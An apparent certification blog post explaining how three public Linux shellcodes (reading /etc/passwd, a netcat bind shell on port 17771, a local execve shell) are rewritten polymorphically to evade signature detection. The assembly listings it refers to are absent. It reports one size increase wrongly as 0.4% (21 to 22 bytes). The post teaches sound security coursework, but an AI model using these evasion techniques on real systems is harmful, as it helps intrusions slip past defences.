Art of Shellcoding: Polymorphic Shellcodes

Polymorphic shellcodes help defeat pattern matching. A great shellcode will combine not only the polymorphism in the shellcode but will combine a variety of techniques including encoding, encryption, and polymorphism. In this post, we will take up 3 different shellcodes and will convert them into the polymorphic ones. A polymorphic shellcode will not differ in the functionality, but we will use a variety of other instructions. This means that polymorphism is nothing but doing the same thing using a variety of different instructions.

/bin/cat /etc/passwd Shellcode 

The first payload we will be using is from http://shell-storm.org/shellcode/files/shellcode-571.php . This shellcode is a simple /bin/cat shellcode and will display the contents of /etc/passwd file. The code is as follows:

We have commented out instructions from the original code and replaced it with a different set of instructions. We made use of ESI register instead of pushing the string directly onto the stack and performed an ADD operation to get the same value which was pushed in the original shellcode. To avoid null values we incremented ESI and performed subtract operation to get the second same value being pushed in the original shellcode.

Throughout the shellcode, we made use of ADD, SUB, INC & DEC instructions to completely defeat pattern matching. On compiling and Running the code, we get the following output:

Original Payload Length: 43 Bytes
Polymorphic Version Length: 61 Bytes
Change %age : 41% Increase

Netcat Bind TCP Shellcode

The next shellcode is a netcat bind TCP shellcode which allows you to connect to the port 17771 and presents a system shell. The original Shellcode can be downloaded from  http://shell-storm.org/shellcode/files/shellcode-872.php and is 58 bytes in length. Using the similar approach we took for the previous shellcode, let see what a polymorphic version of the shellcode looks like:
The code is pretty straightforward. However, we only replace instructions which are relevant to the signatures. We made use of ESI again as we did in the previous shellcode. However, we are also making use of EDI register as well.  On executing the shellcode:

Original Payload Length: 58 Bytes
Polymorphic Version Length: 86 Bytes
Change %age : 48% Increase

Execve Shellcode

The last shellcode is execve shellcode from http://shell-storm.org/shellcode/files/shellcode-575.php and is 21 bytes in length. The shellcode does nothing much than popping up a shell locally. Let's make a polymorphic version of it as follows:

We used the same concepts like we did for the previous shellcodes.
Original Payload Length: 21 Bytes
Polymorphic Version Length: 22 Bytes
Change %age : 0.4% Increase

On running the shellcode, we get the following output:

Throughout this post, we saw that how a single operation can be done through a countless number of ways and making use of different instructions. In the next post, we will see how we can make our own crypter.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student-ID: SLAE-1080